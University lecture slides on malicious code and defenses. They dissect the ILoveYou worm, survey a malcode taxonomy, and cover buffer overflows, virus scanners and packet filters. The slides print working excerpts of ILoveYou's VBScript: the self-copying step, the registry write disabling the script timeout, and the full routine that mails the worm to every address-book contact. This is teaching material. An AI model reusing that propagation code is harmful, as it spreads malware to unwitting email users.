David Evans CS588: Cryptography University of Virginia Computer Science Lecture 20: Malicious Code.
David Evans
http://www.cs.virginia.edu/evans
CS588: Cryptography
University of Virginia, Computer Science
Lecture 20: Malicious Code
21 April 2005 University of Virginia CS 588 2
Menu
• Examination of ILoveYou Code
• Malicious Code Taxonomy
• Malcode Defenses Overview
  – Virus Scanners

LoveLetter.VBS
• This 328-line program caused ~$10B in damage
• How much work and smarts was required?

Main Loop

    rem barok -loveletter(vbe) <i hate go to school>
    rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines
    On Error Resume Next
    ...
    wscr.RegWrite "...Scripting Host\Settings\Timeout", 0
    sub main()
    ...
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    ...
    spreadtoemail()
    ...
    end sub

Smart virus writers don’t include their contact information.
Smart people would convey a more interesting message.
This was smart – turn off the scripting timeout in the registry. (Dumb for Microsoft.)

spreadtoemail (edited to fit)

    sub spreadtoemail()
      for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1
        for ctrentries=1 to a.AddressEntries.Count
          malead=a.AddressEntries(x)
          set male=out.CreateItem(0)
          male.Recipients.Add(malead)
          male.Subject = "ILOVEYOU"
          male.Body = "kindly check the attached LOVELETTER coming from me."
          male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
          male.Send
          x=x+1
        next
      next
    end sub

Smart virus writers understand for loops.
Smart virus writers can spell “mail”.

Be Very Afraid...
• When really dumb people with no resources write malicious programs, it costs $10B.
• What would happen if smart people with resources wrote a malicious program?
  – Paper link: Staniford, Paxson & Weaver, How to 0wn the Internet in Your Spare Time (2002)
• “Warhol worm”: 15 minutes to 0wn Internet

Attacking Malicious Code
• “Malicious Code” is a bad name
  – Code has no intent
  – Programmer’s intent doesn’t matter, what the code does matters
• As networks get more programmable, accidentally harmful code will become common
• We’ll use “malcode” (mal = bad)
  – It’s not a great name either...

Taxonomy of Code

  All Code
    Malcode
      Created by Malicious Author
      Accidental
    Harmless Code (occasionally programs are actually useful, too)

Taxonomy of Malcode [Stallings, p. 502]

  Malcode
    Requires Host Program: Viruses, Trojan Horses, Logic Bombs, Trap Doors
    Independent: Worms
  Self-Replicating: Viruses, Worms
  Insiders

Worms and Viruses
• People get into stupid arguments over whether something is a “worm” or a “virus”
  – Is the Internet a host program?
    • See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988
  – Is Outlook a host program for an email?
• Similarly, for worms/viruses/Trojans
  – If the user must open it (e.g., ILoveYou), is it self-replicating?

Trojan Horses
• Greeks and Trojans at war – Eris (Discord), Paris, Aphrodite, Helen
• Greeks attacking Troy, bombarded city for 10 years, but couldn’t get through city walls.
• Pretended to leave, left big wooden horse as gift
• Trojans brought horse into city (had to tear down part of wall to do this), got silly drunk celebrating victory.
• Greeks jumped out, killed sentries, and let in Greek army.

Modern Trojan Horses
• User runs program that looks harmless
  – Program pretends to be “cool, dancing bears”, also erases your hard drive
• Most attacks today are Trojan Horses
  – ILoveYou, Melissa, recent Microsoft attack, etc.
• Rely on modern humans being as dumb as mythical Trojans
  – No matter how good your city/fire walls are, they don’t do any good if you can’t stop users from running random code

Differences between Morris Worm 1988 and Melissa/ILoveYou 1999

Vulnerabilities Exploited
• Morris Worm:
  – Buffer overflow: fingerd uses gets
  – sendmail debug mode
  – Weak Unix passwords
• Melissa:
  – Word enables macros by default, no limitations on macro behavior
• ILoveYou:
  – Dumb people will run code attached to email
• Code Red/Nimda:
  – Buffer overflow in IIS

Buffer Overflows

Stack diagram labels: Frame Pointer, Return Address, int k

    char s[64];
    ...
    int i;
    gets (s);

Input more than 64 bits: gets just writes down the stack
  bit 65: address of bit 66 on stack
  bits 66-...: instructions

Preventing Buffer Overflows
• Use run-time checks on all memory references
  – Safe languages (CLU, Java, Eiffel, etc.)
  – Safe libraries for C (don’t use gets, strcpy, etc.)
• Obfuscation
  – Randomize locations in memory
• Separate code and data segments
  – Make code segment unwriteable (once application loaded), only allow jumps in code segment
• Static analysis
  – Check binary or source code
• But – about ½ of recent vulnerabilities are still buffer overflows!
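As an added example (not from the lecture), the bounded line reader a "safe library for C" substitutes for the gets(s) call on the slide: it assumes the same 64-byte buffer and a constructed two-line input, and shows that an over-long line is truncated and drained rather than written down the stack.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(s) (added example, not from the lecture).
 * Stores at most cap-1 bytes, always NUL-terminates, strips the newline,
 * and discards the rest of an over-long line so the excess can neither
 * overwrite the stack (as with gets) nor be mistaken for the next line.
 * Returns the number of bytes stored, or -1 on EOF/error. */
int read_line_bounded(char *dst, size_t cap, FILE *in) {
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';            /* whole line fit in the buffer */
    } else {
        int c;                        /* line was truncated: discard its tail */
        while ((c = fgetc(in)) != EOF && c != '\n') { }
    }
    return (int)len;
}

/* Demo with constructed input: a 100-byte line (longer than the 64-byte
 * s[] from the slide) followed by a short one.  Returns 1 if the long line
 * was cut to 63 bytes and the short line still arrived intact, i.e. nothing
 * spilled past s[] or into the next read; 0 otherwise. */
int demo_overlong_input(void) {
    char s[64];
    char line[128];
    memset(line, 'A', 100);
    line[100] = '\0';
    FILE *f = tmpfile();
    if (f == NULL) return 0;
    fprintf(f, "%s\nsecond\n", line);
    rewind(f);
    int n1 = read_line_bounded(s, sizeof s, f);
    int ok1 = (n1 == 63 && strlen(s) == 63);
    int n2 = read_line_bounded(s, sizeof s, f);
    int ok2 = (n2 == 6 && strcmp(s, "second") == 0);
    fclose(f);
    return ok1 && ok2;
}
```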

Replication Strategy
• Morris Worm
  – Searched .forward files (should have used .rhosts) to find other hosts to attack
  – Used password guessing to break into other accounts
  – Used fingerd, sendmail vulnerabilities
• Melissa/ILoveYou
  – Emails itself to entries in victim’s Outlook address book

Damage
• Morris Worm
  – Infected ~6000 computers (10% of Internet)
• Melissa
  – Infected 1.2 Million machines in a few hours
• ILoveYou
  – $10 Billion in damage
• Theorized worst case worm
  – ~$50B (Nicholas Weaver and Vern Paxson, A Worst-Case Worm, WEIS 2004)

Outcomes
• Internet Worm (Robert Morris, Jr.)
  – 3 years suspended sentence (no jail time), $10,000 fine.
  – Current occupation
• Melissa (David Smith) (~$80m damages)
  – Pleaded guilty, Dec 1999 (second successful prosecution of a virus author), link to plea agreement on manifest
  – Hired by Rutgers as Computer Technician while awaiting sentencing
• ILoveYou ($10B damages)
  – Released without penalty, no laws in Philippines

Responses
• Morris Worm
  – Disconnect from network
  – Disorganized, phone
    • Anonymous message (probably from Robert Morris) explaining how to disable the virus was not noticed or distributed
  – DARPA established CERT
• Melissa
  – CERT Advisory, Eradicated quickly
    • But CERT had to rebuild Web server
• ILoveYou
  – Many countries have since passed laws, Europe treaty announced last week

21 April 2005 University of Virginia CS 588 22
Malcode Defenses
1. Prevent malcode from running
2. Limit damage it can do
3. Discourage attackers

Malcode Defenses
1. Prevent malcode from running
   Virus scanners – recognize known malcode
   Firewalls – drop incoming packets
   Code signing (only run code from trusted sources)
   Education – make users smarter
2. Limit damage it can do
   Sandbox (“Playpen”) – run malcode in protected virtual machine
   Reference monitors – enforce policy on execution
   Intrusion Detection, System maintenance
3. Discourage attackers
   Legal – pass laws to penalize attackers
(Slide labels: Today, Tuesday)

Virus Scanners
• Compare code to a database of known malicious code
  – Smart authors create self-mutating viruses
  – Smart virus scanners try to deal with this (but usually fail)
• Reasonably useful in days of “sneaker” net (viruses spread on floppies)
• Reasonably useless when viruses spread as fast as email

Virus Spreading
• Read email every hour
• Everyone’s address book contains 50 people
• Infects 300M people in 6 hours!
[Chart: number of infected people (0 to 350,000,000) against hour (1 to 6)]

What Virus Scanner Peddlers Do (2001)
http://security.norton.com/

First, it tells you to lower your security settings to allow ActiveX.
Always Click “Yes”
During the download, you might see one or more messages asking if it is OK to download and run these programs. Click Yes when these messages appear.
What it Should Do
• Tell people who have ActiveX turned off, “Good Job”
• Tell people who click “OK” to run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education!

Malcode Defenses
1. Prevent malcode from running
   Virus scanners – recognize known malcode
   Firewalls – drop incoming packets
   Code signing (only run code from trusted sources)
   Education – make users smarter
2. Limit damage it can do
   Sandbox (“Playpen”) – run malcode in protected virtual machine
   Reference monitors – enforce policy on execution
   Intrusion Detection, System maintenance
3. Discourage attackers
   Legal – pass laws to penalize attackers

The Best Firewall
(Diagram labels: to network, power)
Functionality is Bad

Lesser Firewall
(Diagram label: to network)

    firewall (p: packet) {
      if (allow (p)) forward (p);
      else drop (p);
    }

Networks – OSI Model

  OSI layer      Other
  Application    FTP, SMTP, HTTP, RealPlayer, ...
  Presentation
  Session
  Transport      TCP, UDP
  Network        IP
  Data Link      Ethernet, FDDI, CDMA, Smoke Signals
  Physical

An IP (V4) Packet

  Bits 0-15:     IP Version (4) | IP Header Length | Type of Service (not used)
  Bits 16-31:    Size of Datagram
  Bits 32-47:    Packet Identification
  Bits 48-63:    Flags | Fragment Offset
  Bits 64-79:    TTL | Transport Protocol (e.g., TCP)
  Bits 80-95:    Header Checksum
  Bits 96-127:   Source IP Address
  Bits 128-159:  Destination IP Address
  Bits 160-...:  Options, Data

A Simple Packet Filter

    boolean allow (packet) {
      if (match (packet.source, "18.26.4.*"))
        return false; // No packets from Robert Morris’ machines.
      else if (match (packet.source, "149.150.209.*"))
        return false; // Cheaton Hall
      else
        return true;
    }

Typical Packet Filtering Rules

Incoming:
    permit 0.0.0.0 128.143.137.19 TCP src >= 1024 dst = 25
    permit 0.0.0.0 128.143.137.19 TCP src = 25 dst >= 1024
Outgoing:
    permit 128.143.137.19 0.0.0.0 TCP src = 25 dst >= 1024
    permit 128.143.137.19 0.0.0.0 TCP src >= 1024 dst = 25
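As an added example (not from the lecture), the four permit rules above encoded in C as the allow() of the firewall loop shown earlier, with default deny; the client address 192.0.2.10 used in the checks and the allow_pkt wrapper are constructed for the demonstration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>
/* Stateless filter for the mail host 128.143.137.19 (added example, not the
 * lecture's code).  "0.0.0.0" is the any-address wildcard, as on the slide;
 * a packet no rule permits is dropped (default deny). */
enum proto { TCP = 6, UDP = 17 };
enum op { EQ, GE };                        /* port predicate: == or >= */
struct port_cond { enum op op; uint16_t value; };
struct packet {
    const char *src_ip, *dst_ip;           /* dotted quads (constructed) */
    enum proto proto;
    uint16_t src_port, dst_port;
};
struct rule { const char *src_ip, *dst_ip; enum proto proto; struct port_cond src, dst; };

static const struct rule RULES[] = {
    /* incoming: clients to our SMTP port, and replies from remote mail hosts */
    { "0.0.0.0", "128.143.137.19", TCP, {GE, 1024}, {EQ, 25} },
    { "0.0.0.0", "128.143.137.19", TCP, {EQ, 25},   {GE, 1024} },
    /* outgoing: our replies, and our deliveries to remote mail hosts */
    { "128.143.137.19", "0.0.0.0", TCP, {EQ, 25},   {GE, 1024} },
    { "128.143.137.19", "0.0.0.0", TCP, {GE, 1024}, {EQ, 25} },
};

static bool ip_match(const char *pattern, const char *ip) {
    return strcmp(pattern, "0.0.0.0") == 0 || strcmp(pattern, ip) == 0;
}
static bool port_match(struct port_cond c, uint16_t port) {
    return c.op == EQ ? port == c.value : port >= c.value;
}

/* allow() from the firewall loop on the earlier slide: first matching permit wins. */
bool allow(const struct packet *p) {
    for (size_t i = 0; i < sizeof RULES / sizeof RULES[0]; i++) {
        const struct rule *r = &RULES[i];
        if (r->proto == p->proto && ip_match(r->src_ip, p->src_ip) &&
            ip_match(r->dst_ip, p->dst_ip) && port_match(r->src, p->src_port) &&
            port_match(r->dst, p->dst_port))
            return true;
    }
    return false;                          /* default deny */
}
/* Wrapper (constructed) so one packet can be described in a single call. */
bool allow_pkt(enum proto proto, const char *src_ip, uint16_t src_port,
               const char *dst_ip, uint16_t dst_port) {
    struct packet p = { src_ip, dst_ip, proto, src_port, dst_port };
    return allow(&p);
}
```

Note that the second incoming rule admits any TCP packet whose source port is 25 to every port above 1023 on the mail host; a stateless filter without connection tracking cannot tell a reply from a probe that merely chooses source port 25.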

Packet Filter Layers
[Same layer diagram as the OSI Model slide: Application (FTP, SMTP, HTTP, RealPlayer, ...), Presentation, Session, Transport (TCP, UDP), Network (IP), Data Link (Ethernet, FDDI, CDMA, Smoke Signals), Physical]

Application-Layer Gateways
• Analyze communication at application layer
• All communication must go through a proxy that knows about application
• Able to detect application-level attacks
• Poor scalability, performance
• Fail-safe is annoying

Malcode on the Near Horizon
• Cell Phones
  – Billions of them worldwide, becoming as complex as computers were in 1988
  – About 60% run Symbian OS
• Cabir (November 2004) – spread using Bluetooth (short range networking) on Symbian OS (but required user agreement)
• CommWarrior (March 2005) – spread using phone network (multimedia messages), contact list
• Today: spread limited – only 2% of phones are “smartphones” (this will change soon!)

Malcode Summary
• Best defense is education
• Next best defense is a good offense
  – Tough legal penalties for convicted attackers
  – Doesn’t work against motivated foreign governments
• Some Technical Defenses
  – Virus Scanners
  – Tuesday:
    • Reference Monitors, Proof-Carrying Code
    • Firewalls, Intrusion Detection

Charge
• Project Presentations will be final class: Tuesday, May 3
• Normal project expectation:
  – Your team will make a presentation on May 3 (up to 15 minutes, can be as short as 5)
  – You will hand in a paper report on May 3
  – You will put up a web page (that could just be the same as your paper report)
• Take home final out May 3, due May 7
  – Some public-key cryptosystems questions
  – Something involving hash chains
  – One essay question (security analysis)